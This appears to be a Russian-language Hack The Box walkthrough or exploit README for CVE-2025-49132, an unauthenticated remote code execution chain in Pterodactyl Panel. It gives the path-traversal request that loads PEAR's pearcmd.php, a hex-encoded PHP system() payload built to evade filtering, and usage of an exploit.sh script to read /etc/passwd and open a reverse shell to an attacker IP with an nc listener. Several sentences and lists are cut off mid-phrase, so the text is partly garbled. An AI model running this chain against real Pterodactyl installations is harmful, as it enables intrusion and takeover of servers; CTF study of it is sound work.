
Неаутентифицированный эксплойт RCE для CVE-2025-49132 в Pterodactyl Panel через обход пути, внедрение команд PEAR и выполнение PHP-кода. Включает разбор HTB и вспомогательный скрипт.
HTB Season 10 - Разбор машины Pterodactyl
Цель: Pterodactyl HTB Machine (Средняя сложность)
CVE: CVE-2025-49132
Критичность: Критическая (CVSS 9.8)
Тип атаки: Неаутентифицированное удаленное выполнение кода
Затронуто: Pterodactyl Panel < v1.11.11
Эта цепочка эксплойта объединяет:
Конечная точка /locales/locale.json панели Pterodactyl позволяет обход пути через параметр locale:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
Это можно объединить с pearcmd.php от PEAR для:
/tmpPEAR (PHP Extension and Application Repository) имеет CLI-инструмент (pearcmd.php), который:
config-create, которая записывает файлыЦепочка эксплойта:
Обход пути → Загрузка pearcmd.php → Внедрение PHP через config-create → Выполнение вредоносного PHP
Команды кодируются в hex с помощью hex2bin(), чтобы обойти:
Пример:
Команда: whoami
Hex: 77686f616d69
Полезная нагрузка: <?=system(hex2bin('77686f616d69'))?>
Метод: Использование предоставленного exploit.sh
chmod +x exploit.sh
# Получить флаг пользователя
./exploit.sh flag
# Выполнить команды
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# Обратная оболочка
nc -lvnp 4444 # На машине атакующего
./exploit.sh shell 10.10.14.21 4444